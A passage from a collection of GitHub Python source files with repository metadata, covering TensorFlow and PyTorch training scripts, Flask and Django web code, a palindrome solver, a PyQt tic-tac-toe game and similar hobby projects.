tf.placeholder(tf.string, [None]),\n 'location_encode': tf.placeholder(tf.string, [None]),\n 'community_encode': tf.placeholder(tf.string, [None]),\n 'agency_encode': tf.placeholder(tf.string, [None]),\n 'complaint_encode': tf.placeholder(tf.string, [None]) \n }\n features = {\n key: tf.expand_dims(tensor, -1)\n for key, tensor in feature_placeholders.items()\n }\n return tf.estimator.export.ServingInputReceiver(features, feature_placeholders)\n\ndef train_and_evaluate(output_dir, hparams):\n unique_vals = dict()\n unique_vals['day_period'] = ['morning', 'afternoon', 'evening', 'night']\n unique_vals['day_of_week'] = ['Mon-Tue', 'Wed-Thu', 'Fri-Sat-Sun']\n unique_vals['zip_encode'] = ['zip_bin1', 'zip_bin2', 'zip_bin3', 'zip_bin4']\n unique_vals['location_encode'] = ['location_bin1', 'location_bin2', 'location_bin3', 'location_bin4']\n unique_vals['community_encode'] = ['community_bin1', 'community_bin2', 'community_bin3']\n unique_vals['agency_encode'] = ['agency_bin1', 'agency_bin2', 'agency_bin3', 'agency_bin4', 'agency_bin5', 'agency_bin6']\n unique_vals['complaint_encode'] = ['complaint_bin1', 'complaint_bin2', 'complaint_bin3']\n\n feature_columns = []\n for each in COLUMNS[1:-1]:\n feature_columns.append(\n tf.feature_column.categorical_column_with_vocabulary_list(\n key = each,\n vocabulary_list = unique_vals[each]\n )\n )\n\n # used to wrap the model_fn and returns ops necessary to perform training, evaluation, or predictions\n estimator = tf.estimator.LinearRegressor(\n feature_columns = feature_columns,\n model_dir = output_dir\n )\n\n train_spec = tf.estimator.TrainSpec(\n input_fn = read_dataset(\n filename = hparams['train_data_paths'],\n mode = tf.estimator.ModeKeys.TRAIN,\n batch_size = hparams['train_batch_size']\n ),\n max_steps = hparams['train_steps']\n )\n \n exported = tf.estimator.LatestExporter('exporter', serving_input_fn, exports_to_keep=None)\n\n #eval_spec consists of computing metrics to judge the performance of the trained model.\n eval_spec = tf.estimator.EvalSpec(\n input_fn = read_dataset(\n filename = hparams['eval_data_paths'],\n mode = tf.estimator.ModeKeys.EVAL,\n batch_size = 1000\n ),\n #start_delay_secs = 60,\n #throttle_secs = 120,\n exporters = exported\n )\n\n tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)\n","repo_name":"Shraddha2702/Summer_AI","sub_path":"ServiceAndRides/TensorflowTrainer/.ipynb_checkpoints/model-checkpoint.py","file_name":"model-checkpoint.py","file_ext":"py","file_size_in_byte":5803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41264027717","text":"import numpy as np\nimport cv2\nimport argparse\nfrom enum import Enum\nimport time\nfrom collections import namedtuple\nimport json\nimport os\n\n\ndef main(video_file_path, original_fps, video_speed):\n\n with open(os.path.splitext(os.path.basename(video_file_path))[0] + \".json\") as f:\n all_actions = json.load(f)\n\n before_len = []\n after_len = []\n total_len = []\n for action in all_actions:\n before_len.append(action[\"contact_frame\"] - action[\"start_frame\"])\n after_len.append(action[\"end_frame\"] - action[\"contact_frame\"])\n total_len.append(action[\"end_frame\"] - action[\"start_frame\"])\n\n total_frames = 18120\n\n print(len(all_actions))\n\n print(\"before: {}\".format(sum(before_len) / len(before_len)))\n print(\"after: {}\".format(sum(after_len) / len(after_len)))\n print(\"total: {}\".format(sum(total_len) / len(total_len)))\n # print(\"Percent: {}\".format(interesting_frames / total_frames))\n\n # print(len(all_actions))\n # cap = cv2.VideoCapture(video_file_path)\n #\n # while cap.isOpened():\n # frame_num = cap.get(cv2.CAP_PROP_POS_FRAMES)\n # if frame_num % 1000 == 0:\n # print(\"Frame num: {}\".format(frame_num))\n # ret, frame = cap.read()\n # if not ret:\n # # Break if we are at the end of the video\n # break\n #\n # if frame_num in contact_frames:\n # cv2.imshow('frame', frame)\n # pressed_key_value = cv2.waitKey(1000)\n # normalized_key_value = pressed_key_value & 0xFF\n # if normalized_key_value == ord('q'):\n # break\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(\n description=\"Create a label.json file for a video.\"\n )\n parser.add_argument(\"--video\", help=\"Path to the video file\")\n # parser.add_argument(\"--tmp_dir\", help=\"Path to the temp dir\", default=\"tmp\")\n parser.add_argument(\n \"--fps\", type=int, default=240, help=\"The original fps of the video\"\n )\n parser.add_argument(\n \"--speed\",\n type=float,\n default=0.18,\n help=\"The speed to try and show the video at\",\n )\n args = parser.parse_args()\n\n main(args.video, args.fps, args.speed)\n","repo_name":"atkaiser/tennis","sub_path":"util_scripts/visualize_frames.py","file_name":"visualize_frames.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38587620293","text":"import numpy as np\n\ndata = np.mat([[1, 200, 105, 3, False],\n [2, 165, 80, 2, False],\n [3, 184.5, 120, 2, False],\n [4, 116, 70.8, 1, False],\n [5, 270, 150, 4, True]])\n\ncoll = []\nfor row in data:\n coll.append(row[0, 1])\nprint(np.sum(coll)) # 和\nprint(np.mean(coll)) # 均值\nprint(np.std(coll)) # 标准差\nprint(np.var(coll)) # 方差\n","repo_name":"Inspring6/OpenCV_TensorFlow","sub_path":"ch03/program3-3.py","file_name":"program3-3.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11889547734","text":"from docx import Document\nimport os\n\ndef points_to_you(expected, result):\n ex = expected.split(\"-\")\n print(ex)\n if ex[0] == result[0] and ex[1] == result[1]:\n return 15\n elif result[0] > result[1] and ex[0] > ex[1] or\\\n result[0] < result[1] and ex[0] < ex[1] or\\\n result[0] == result[1] and ex[0] == ex[1]:\n return 10\n elif ex[0] == result[0] and ex[1] != result[1] or\\\n ex[0] != result[0] and ex[1] == result[1]:\n return 5\n return 0\n\ndef amount_of_points(filename):\n wordDoc = Document('FILES/' + filename)\n iterator = 0\n j = 0\n points = 0\n for table in wordDoc.tables:\n for row in table.rows:\n if iterator == 1:\n naam = row.cells[0].text.strip()\n if iterator > 2 and iterator < 51:\n if j < len(result):\n points += points_to_you(row.cells[4].text, result[j])\n else:\n break\n j += 1\n iterator += 1\n return naam, points\n\ndef makefile(tussenstand):\n doc = Document()\n doc.add_heading('Tussenstand WK Poule', 0)\n tussenstand.sort(key=lambda a: (a[1], a[0]), reverse=True)\n table = doc.add_table(rows=1, cols=3)\n hdr_cells = table.rows[0].cells\n hdr_cells[0].text = 'Ranking'\n hdr_cells[1].text = 'Naam'\n hdr_cells[2].text = 'Punten'\n it = 1\n for naam, punten in tussenstand:\n row_cells = table.add_row().cells\n row_cells[0].text = str(it)\n row_cells[1].text = naam\n row_cells[2].text = str(punten)\n it += 1\n doc.add_page_break()\n doc.save('Groepsfase_Uitslag.docx')\n\ndef groepsfasefile(ranking):\n with open('groepsfase.txt', 'w') as f:\n for item in ranking:\n f.write(item[0] + \" \" + str(item[1]) + \"\\n\")\n\nf = open(\"uitslagen\",\"r\")\nlines = f.readlines()\nresult = []\nfor item in lines:\n temp = item.split(\" \")\n if len(temp) > 2:\n result.append([temp[2], temp[3].strip()])\n\nlijst = os.listdir(\"FILES\")\nranking = []\nfor file in lijst: \n ranking.append(amount_of_points(file))\nprint(ranking)\ngroepsfasefile(ranking)","repo_name":"RSlanjouw/WK_Pooltje","sub_path":"simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25423150249","text":"\nclass Solution:\n def longestPalindrome(self, s: str) -> str:\n if not s:\n return \"\"\n longest: str = s[0]\n\n # odd length answers\n for i in range(0, len(s)):\n j: int = 1\n best_j: int = 0\n while (i-j) >= 0 and (i+j) < len(s) and s[i-j] == s[i+j]:\n if (2 * j + 1) > len(longest):\n best_j = j\n j += 1\n if best_j:\n longest = s[i-best_j:i+best_j+1]\n\n # even length answers\n for i in range(0, len(s)):\n j: int = 1\n best_j: int = 0\n while (i-j) >= 0 and (i+j-1) < len(s) and s[i-j] == s[i+j-1]:\n if (2 * j) > len(longest):\n best_j = j\n j += 1\n if best_j:\n longest = s[i-best_j:i+best_j]\n\n return longest\n\n\nsolution = Solution()\ntestcases = [\n \"abcba\",\n \"zabcbaa\",\n \"cbbd\",\n \"a\",\n \"ac\",\n \"\"\n]\nfor t in testcases:\n print(f'{t}: {solution.longestPalindrome(t)}')\n","repo_name":"codycoggins-virtru/leetcode","sub_path":"longest_palindrome.py","file_name":"longest_palindrome.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34275515228","text":"import cv2\nimport numpy as np\nimport os\nfrom utils import show_process_steps, full_annotation, show_summary\nfrom improc import get_white_connected_components, filter_center_masses, classify_white_components\n\n\ndef parse_image(file_path):\n # Load image\n im_rgb = cv2.cvtColor(cv2.imread(file_path, cv2.IMREAD_COLOR), cv2.COLOR_BGR2RGB)\n im_gray = cv2.cvtColor(im_rgb, cv2.COLOR_RGB2GRAY)\n\n # Processing log, containing the steps of the process\n processing_log = [\n ('Original Image', im_rgb)\n ]\n\n # Get white components and their center masses\n white_components, y_cms, x_cms, components_matrix = get_white_connected_components(im_gray, processing_log)\n filter_center_masses(white_components, x_cms, y_cms, components_matrix, im_gray, processing_log)\n\n # Classify the white components as musical notes\n white_components, y_cms, x_cms, white_component_notes = classify_white_components(\n white_components, np.squeeze(x_cms), y_cms,\n im_gray, components_matrix, processing_log)\n full_annotation(im_rgb.copy(), y_cms, x_cms, white_component_notes,\n white_components, components_matrix, processing_log)\n\n # Show the process steps and the final result\n show_process_steps(processing_log)\n show_summary(processing_log)\n\n\nif __name__ == '__main__':\n images_path = 'images'\n for file in os.listdir(images_path):\n parse_image(os.path.join(images_path, file))\n","repo_name":"yehudabab/PyPiano","sub_path":"entry_point.py","file_name":"entry_point.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"42073513369","text":"import matplotlib.pyplot as plt\nimport time\nimport numpy as np\n\nimport torch.nn as nn\nimport torch\nfrom torch.nn import Conv2d, MaxPool2d, ReLU, Sequential, BatchNorm2d, Dropout, Module, Linear\nfrom torch import optim\nfrom torchvision import datasets, transforms\nfrom torchvision.transforms.transforms import Grayscale\nimport torch.functional as F\n\n\ndata_dir = \"./MNIST_jpg\" # or the path where you have downloaded the dataset\n\n\n\ntrain_transform = transforms.Compose([transforms.Grayscale(),\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))])\n\ntest_transform = transforms.Compose([transforms.Grayscale(),\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))])\n\ndata_dir = 'MNIST_jpg' \n\ntrain_data = datasets.ImageFolder(data_dir + '/train', transform=train_transform)\ntest_data = datasets.ImageFolder(data_dir + '/test', transform=test_transform)\n\ntrainloader = torch.utils.data.DataLoader(train_data, batch_size=32, shuffle=True)\ntestloader = torch.utils.data.DataLoader(test_data, batch_size=32, shuffle=False)\n\nclass_list = train_data.classes\n\n\n\nnet = Net()\noptimizer = optim.SGD(net.parameters(), lr=0.001, momentum=0.9)\ncriterion = nn.NLLLoss()\n\n# images, labels = next(iter(trainloader))\n# img, label = images[0], labels[0]\n# logits = net(img.view(1, *images[0].shape))\n# # Calculate the loss with the logits and the labels\n# # ps = F.softmax(torch.exp(logits), dim=1)\n# # ps = torch.exp(logits)\n# ps = F.log_softmax(logits, dim=1)\n \n# view_classify_general(img, ps, class_list)\n\ndef check_accuracy(test_loader, model):\n acc_list = []\n y_preds_list = []\n y_true_list = []\n for i, (images_test, y_true) in enumerate(iter(test_loader)):\n y_preds = []\n\n # Flatten EMNIST images into a 784 long vector\n # images_test.resize_(images_test.size()[0], 784)\n logits = model.forward(images_test)\n # output_preds = F.softmax(logits, dim=1)\n output_preds = (logits)\n for p in output_preds:\n y_preds.append(p.argmax())\n \n y_preds = np.array(y_preds)\n y_preds = torch.tensor(y_preds)\n\n for i in range(y_preds.size(0)):\n y_preds_list.append(y_preds[i].item())\n y_true_list.append(y_true[i].item())\n\n accuracy = (np.array(y_preds_list) == np.array(y_true_list)).sum()/len(y_preds_list)\n print(accuracy)\n\n return accuracy, y_preds_list, y_true_list\n\nepochs = 5\nprint_every = 40\naccs_test = []\n\nstart = time.time()\nfor e in range(epochs):\n running_loss = 0\n print(f\"Epoch: {e+1}/{epochs}\")\n\n for i, (images, labels) in enumerate(iter(trainloader)):\n\n # Flatten EMNIST images into a 784 long vector\n # images.resize_(images.size()[0], 784)\n \n optimizer.zero_grad()\n \n output = net.forward(images) # 1) Forward pass\n # print(output, output.shape)\n loss = criterion(output, labels) # 2) Compute loss\n # print(loss)\n loss.backward() # 3) Backward pass\n optimizer.step() # 4) Update model\n \n running_loss += loss.item()\n \n if i % print_every == 0:\n print(f\"\\tIteration: {i}\\t Loss: {running_loss/print_every:.4f}\")\n running_loss = 0\n net.eval()\n with torch.no_grad():\n\n acc, y_pred, y_true = check_accuracy(testloader, net)\n accs_test.append(acc)\n net.train()\nprint(f'It took {time.time() - start} s to train')\n","repo_name":"alessiorecchia/strive_exe","sub_path":"M6_Computer_Vision/06. Contours and Blob detection/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"1510137189","text":"# -*- coding: utf-8 -*-\nfrom subprocess import CalledProcessError\nfrom unittest import TestCase\n\nfrom lib import cli\n\n\nclass TestCli(TestCase):\n def test_cat(self):\n lines = cli.run_cmd([\"cat\", \"../res/foobar.txt\"])\n self.assertEqual(lines[0], \"foo\")\n self.assertEqual(lines[1], \"bar\")\n\n def test_err(self):\n self.assertRaises(CalledProcessError, lambda: cli.run_cmd([\"cat\", \"../res/fooba.txt\"]))\n","repo_name":"enguerrand/tie","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15871562804","text":"input = open(\"input.txt\", \"r\")\ninputArr = []\nfrom math import atan\n\ndef viewCount(asteroids, station):\n\tvisibleAsteroids = []\n\tfor asteroid in asteroids:\n\t\tx = station[0]-asteroid[0]\n\t\ty = station[1]-asteroid[1]\n\t\tif x != 0 and y != 0:\n\t\t\tif any(atan(y/x) not in a for a in visibleAsteroids):\n\t\t\t\tvisibleAsteroids.append([asteroid[0], asteroid[1], atan(y/x)])\n\t\telse:\n\t\t\tif any(0 not in a for a in visibleAsteroids):\n\t\t\t\tvisibleAsteroids.append([asteroid[0], asteroid[1], 0])\n\treturn len(visibleAsteroids)\n\n\n\nfor line in input:\n\tinputArr.append(list(line[:-1]))\nasteroids = []\nfor l in range(len(inputArr)):\n\tfor i in range(len(inputArr[l])):\n\t\tif inputArr[l][i] == '#':\n\t\t\tasteroids.append([l, i])\nprint(asteroids)\nmaxView = 0\nmaxViewStation = []\nfor asteroid in asteroids:\n\tviewcount = viewCount(asteroids, asteroid)\n\tif viewcount > maxView:\n\t\tmaxView = viewcount\n\t\tmaxViewStation = asteroid\n\nprint(maxView)\nprint(maxViewStation)","repo_name":"OBenjaminT/advent-of-code-in-python","sub_path":"2019/Day 10/Part 1/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"18161611097","text":"import os\nimport logging\nfrom collections import defaultdict\n\nimport utils\n\nlogger = logging.getLogger(__name__)\n\nclass History:\n\n def __init__(self, path, file_name='history.json', tensorboard=False):\n utils.ensure_dir(path) \n self.path = path \n self.filepath = os.path.join(self.path, file_name)\n self.generation = 0\n self.history = defaultdict(dict)\n self.tensorboard = tensorboard\n self.n_individuals = 0\n '''\n history = {\n generation_x: {\n individual: {\n all_metrics_here\n }\n }\n }\n '''\n logger.info(f'Recording history dump to {self.filepath}')\n\n if tensorboard:\n from tensorboardX import SummaryWriter\n self.tb_writer = SummaryWriter(self.path)\n logger.debug(f'Using tensorboard at {self.path}')\n\n def update(self, individual, metrics: dict):\n logger.debug('History - updating metrics')\n individual = ' '.join([str(x) for x in individual])\n self.n_individuals += 1\n if self.tensorboard:\n for metric, value in metrics.items(): \n self.tb_writer.add_scalar(f'metrics/{metric.title()}', value, self.n_individuals)\n logger.debug(f'Writing to tensorboard {metric.title(), value}')\n self.history[self.generation][individual] = metrics\n \n def update_generation(self,): \n self.generation += 1\n if self.tensorboard:\n self.tb_writer.add_scalar('train/Generations', self.generation, self.generation)\n logger.debug(f'Updated generation to {self.generation}')\n \n def serialize(self):\n logger.debug(f'Updating history logs on disk at {self.filepath}')\n utils.save_json(self.filepath, self.history)\n","repo_name":"pfmiehe/ga-for-sql-queries","sub_path":"history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24487622145","text":"# importing necessary modules\nfrom flask import request, make_response\nfrom flask_restplus import Resource, fields\nfrom controllers.session import token_required\n# importing models\nfrom models.comment import Comment\nfrom models.photo import Photo\n# importing models\nfrom schemas.comment import CommentSchema\nfrom schemas.photo import PhotoSchema\n\n# importing class server\nfrom server.instance import server\n# starting server modules\napi = server.api\napp = server.app\n# starting server namespace\ngallery_ns = server.gallery_ns\n# instantiating schemas\nphoto_schemy = CommentSchema()\ncomment_list_scheme = CommentSchema(many=True)\nphoto_schemy = PhotoSchema()\n# standard messages\nITEM_NOT_FOUND = 'Comment not found'\n# template for documentation\nCommit = gallery_ns.model('Commit', {\n 'commit': fields.String(description='Comment'),\n 'url': fields.String(description='url Comment')\n})\n\n\n@api.route('/comments/')\nclass ControllerComments(Resource):\n\n @token_required\n def get(self, current_user):\n \"\"\"method that lists all commits\n\n\n Returns:\n [json]: [returns all commits]\n \"\"\"\n url = request.args.get('url')\n user_data = Comment.query.filter(Comment.photo_id.url == url)\n return comment_list_scheme.dump(user_data), 200\n\n\n@api.route('/comment/')\nclass ControllerComment(Resource):\n @gallery_ns.expect(Commit)\n @gallery_ns.doc('Create Comment')\n @token_required\n def post(self, current_user):\n \"\"\"method create the commit\n\n\n Returns:\n [json]: [return success or failure message]\n \"\"\"\n body = request.get_json()\n print(body)\n photo = Photo.query.filter(\n Photo.url == body['url']).first()\n print(photo)\n if photo:\n Comment(photo_id=photo, commit=body['commit']).save()\n return make_response('Successfully registered.', 201)\n else:\n return make_response('Photo does not exist to be commented.', 202)\n\n @token_required\n @gallery_ns.doc('Delete Comment')\n def delete(self, current_user):\n \"\"\"method delete the commit\n\n\n Returns:\n [json]: [return success or failure message]\n \"\"\"\n commit = request.args.get('commit')\n objCommit = Comment.query.filter(\n Comment.commit == commit).first()\n if (objCommit):\n objCommit.remove()\n return 'deleted Comment', 204\n return {'message': ITEM_NOT_FOUND}\n","repo_name":"jhonatheberson/Anchor-Loans-challenge","sub_path":"BackEnd/src/controllers/comment.py","file_name":"comment.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24490928240","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.contrib.gis.db.models.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='CatalogoLandsat',\n fields=[\n ('objectid', models.AutoField(serialize=False, primary_key=True)),\n ('image', models.CharField(max_length=255, unique=True)),\n ('path', models.CharField(max_length=500)),\n ('url_tms', models.CharField(max_length=500)),\n ('data', models.DateField()),\n ('shape', django.contrib.gis.db.models.fields.PolygonField(blank=True, null=True, srid=4674)),\n ],\n options={\n 'db_table': 'catalogo_landsat',\n },\n ),\n ]\n","repo_name":"cenima-ibama/indicar_process","sub_path":"indicarprocess/catalogo/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"2702269780","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_wtf.csrf import CSRFProtect\n\napp = Flask(__name__)\ncsrf = CSRFProtect(app)\nENV = 'dev'\nUPLOAD_FOLDER = './app/static/uploads'\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\napp.config[\"SECRET_KEY\"] = \"secretkey\"\n\nif ENV == 'dev':\n app.debug = True\n app.config[\n \"SQLALCHEMY_DATABASE_URI\"] = \"\"\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = True\nelse:\n app.debug = False\n app.config[\n \"SQLALCHEMY_DATABASE_URI\"] = \"\"\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = True\ndb = SQLAlchemy(app)\n\nfrom app import views # nopep8\n","repo_name":"jvsonjohnson/Info3180-Project-2","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70901940572","text":"id = \"12617\"\napi=\"eca35b8e9\"\ndef recv(msg):\n print(msg)\n\ndevice = bigiot.Device(id,api)\ndevice.say_callback(recv)\ndevice.check_in()\n\ndevice.update(11465,str(32.2))\n\ndevice.say(user_id = 11465, msg = 'hello I am mPython')","repo_name":"ywz978020607/History","sub_path":".trash/IOT_ali/big_test1.py","file_name":"big_test1.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"it","doc_type":"code","stars":111,"dataset":"github-code","pt":"32"} +{"seq_id":"15724210167","text":"from flask import Blueprint, render_template, request, abort, Response\nfrom ...controllers.ControleMensagem import ControleMensagem\nfrom ...extensions.LogErro import LogErro\nfrom flask_login import login_required\nimport traceback\nimport json\nimport sys\n\n\nmensagemAdmBlue = Blueprint(\"mensagemAdmBlue\", __name__)\n\n##############################################################\n# Rotas relacionadas ao enviar mensagem\n##############################################################\n\n#Rota para a tela de enviar mensagem\n@mensagemAdmBlue.route('/mensagem/enviar-mensagem', methods=[\"GET\"])\n@login_required\ndef enviarMensagem():\n try:\n controleMensagem = ControleMensagem()\n grupos = controleMensagem.consultaMaquinas()\n context = {\"titulo\": \"Enviar Mensagem\", \"active\": \"mansagem\", \"grupos\": grupos}\n return render_template(\"administrador/mensagem/mensagem.html\", context=context)\n except:\n log = LogErro()\n tipoExcecao, valorExcecao, tb = sys.exc_info()\n tracebackInfo = traceback.extract_tb(tb)\n log.geraLogErro(tipoExcecao, valorExcecao, tracebackInfo, request.url)\n abort(500)\n\n\n#Rota para enviar mensagem\n@mensagemAdmBlue.route('/mensagem/enviar-mensagem', methods=[\"POST\"])\n@login_required\ndef sendMensagem():\n try:\n data = request.get_json()\n controleMensagem = ControleMensagem()\n controleMensagem.enviarMesagem(data[\"mensagem\"].upper(), data[\"destinos\"])\n resp = Response(response=json.dumps({\"secsses\": True}), status=200, mimetype=\"application/json\")\n return resp\n except:\n log = LogErro()\n tipoExcecao, valorExcecao, tb = sys.exc_info()\n tracebackInfo = traceback.extract_tb(tb)\n log.geraLogErro(tipoExcecao, valorExcecao, tracebackInfo, request.url)\n resp = Response(status=500, mimetype=\"application/json\")\n return resp","repo_name":"Rezende-Fabio/CDA","sub_path":"app/routes/administrador/Mensagem.py","file_name":"Mensagem.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"9191684966","text":"import sys\r\nfrom PyQt4 import Qt, QtGui, QtCore\r\n\r\nclass Computer:\r\n # used to determine strategy\r\n def __init__(self, buttons):\r\n self.buttons = buttons\r\n \r\n def getResponse(self):\r\n for button in self.buttons:\r\n if button.text() == Qt.QString(\"\"):\r\n button.setText(\"O\")\r\n break\r\n\r\nclass MyButton(QtGui.QPushButton):\r\n def __init__(self, text, parent):\r\n super(QtGui.QPushButton, self).__init__(text, parent)\r\n self.setFixedHeight(50)\r\n self.setFixedWidth(50)\r\n self.setFont(QtGui.QFont('SansSerif', 20))\r\n \r\n def onClick(self):\r\n self.setText(\"X\")\r\n self.parent().computer.getResponse()\r\n\r\nclass MainLayout(QtGui.QWidget):\r\n \r\n def __init__(self):\r\n super(MainLayout, self).__init__() \r\n self.initUI()\r\n \r\n def initUI(self):\r\n self.setWindowTitle('tic-tac-toe')\r\n self.setWindowIcon(QtGui.QIcon('web.png'))\r\n \r\n gridLayout = QtGui.QGridLayout()\r\n gridLayout.setContentsMargins(25, 25, 25, 25)\r\n gridLayout.setSpacing(0)\r\n self.setLayout(gridLayout)\r\n \r\n # create 9 buttons\r\n buttons = []\r\n for row in (0,1,2):\r\n for col in (0,1,2):\r\n buttons.append(MyButton('', self))\r\n b = buttons[-1]\r\n b.row = row\r\n b.col = col\r\n Qt.QObject.connect(b, Qt.SIGNAL(\"clicked()\"), b.onClick)\r\n gridLayout.addWidget(b, row, col)\r\n\r\n # keep track of buttons with computer\r\n self.computer = Computer(buttons)\r\n self.show()\r\n \r\ndef main():\r\n app = QtGui.QApplication(sys.argv)\r\n ex = MainLayout()\r\n sys.exit(app.exec_())\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"gjq91459/mycourse","sub_path":"23 Miscellaneous Topics/GUI Frameworks/Qt/06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"70936438491","text":"from django.db import models\nfrom django.utils import timezone\n\n\nclass Item(models.Model):\n \"\"\"An example item with a name, numeric value, and modified timestamp.\"\"\"\n\n name = models.CharField(max_length=128)\n value = models.FloatField()\n modified = models.DateTimeField(default=timezone.now)\n\n def save(self, *args, **kwargs):\n \"\"\"Set the modified timestamp whenever the model is saved.\"\"\"\n self.modified = timezone.now()\n return super().save(*args, **kwargs)\n\n def __str__(self) -> str:\n return self.name\n\n class Meta:\n get_latest_by = \"modified\"\n","repo_name":"aodin/django-example","sub_path":"django_example/example_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"11620087925","text":"from time import sleep\n\nfrom celery import Celery\nfrom celery.schedules import crontab\nfrom prices_crawler import PricesCrawler\n\napp = Celery(\"tasks\", broker=\"pyamqp://guest@localhost//\")\n\n\n@app.task\ndef run():\n prices_crawler = PricesCrawler()\n prices_crawler.run_crawler()\n sleep(3)\n\n\napp.conf.beat_schedule = {\n \"add-every-30-seconds\": {\n \"task\": \"celery_app.run\",\n \"schedule\": crontab(hour=20, minute=1),\n \"args\": (),\n },\n}\napp.conf.timezone = \"UTC\"\n","repo_name":"Lnvictor/Jeru","sub_path":"jeru/jobs/celery_app.py","file_name":"celery_app.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"24855737967","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jun 8 12:24:31 2018\r\n\r\n@author: prasoon\r\n\"\"\"\r\n\r\nimport tensorflow as tf\r\nimport anchors_box as abx\r\nimport model\r\n\r\n\r\ndef rcnn_proposals(proposals, bbox_offsets, cls_prob, num_classes, tf_image_shape):\r\n class_max_detections = 50\r\n class_nms_threshold = 0.3\r\n total_max_detections = 50\r\n min_prob_threshold = 0.5\r\n selected_boxes, selected_probs, selected_labels = [], [], []\r\n\r\n for class_id in range(num_classes):\r\n class_prob = cls_prob[:,class_id+1]\r\n class_boxes = bbox_offsets[:, (class_id*4):(4*class_id + 4)]\r\n raw_class_objects = abx.get_box_from_deltas(proposals, class_boxes)\r\n class_objects = abx.clip_boxes(raw_class_objects, tf_image_shape)\r\n \r\n prob_filter = tf.greater_equal(class_prob, min_prob_threshold)\r\n (xmin, ymin, xmax, ymax) = tf.unstack(class_objects, axis=1)\r\n area_filter = tf.greater(tf.maximum(xmax-xmin,0.0)*tf.maximum(ymax-ymin,0.0), 0.0)\r\n object_filter = tf.logical_and(area_filter, prob_filter)\r\n \r\n class_objects = tf.boolean_mask(class_objects, object_filter)\r\n class_prob = tf.boolean_mask(class_prob, object_filter) \r\n class_objects_tf = abx.switch_xy(class_objects)\r\n \r\n obj_selected_idx = tf.image.non_max_suppression(class_objects_tf, \r\n class_prob, \r\n class_max_detections, \r\n iou_threshold=class_nms_threshold)\r\n class_objects_tf = tf.gather(class_objects_tf, obj_selected_idx)\r\n class_prob = tf.gather(class_prob, obj_selected_idx)\r\n class_objects = abx.switch_xy(class_objects_tf)\r\n\r\n selected_boxes.append(class_objects)\r\n selected_probs.append(class_prob)\r\n selected_labels.append(tf.tile([class_id],[tf.shape(obj_selected_idx)[0]]))\r\n\r\n\r\n objects = tf.concat(selected_boxes, axis=0)\r\n proposal_label = tf.concat(selected_labels, axis=0)\r\n proposal_label_prob = tf.concat(selected_probs, axis=0)\r\n \r\n k = tf.minimum(total_max_detections, tf.shape(proposal_label_prob)[0])\r\n top_k = tf.nn.top_k(proposal_label_prob, k=k)\r\n top_k_proposal_label_prob = top_k.values\r\n top_k_objects = tf.gather(objects, top_k.indices)\r\n top_k_proposal_label = tf.gather(proposal_label, top_k.indices)\r\n\r\n return top_k_objects, top_k_proposal_label, top_k_proposal_label_prob \r\n\r\n\r\ndef rcnn_loss(cls_score, proposal_cls_targets, bbox_offsets, bbox_offset_targets, num_classes):\r\n cls_target = tf.cast(proposal_cls_targets, 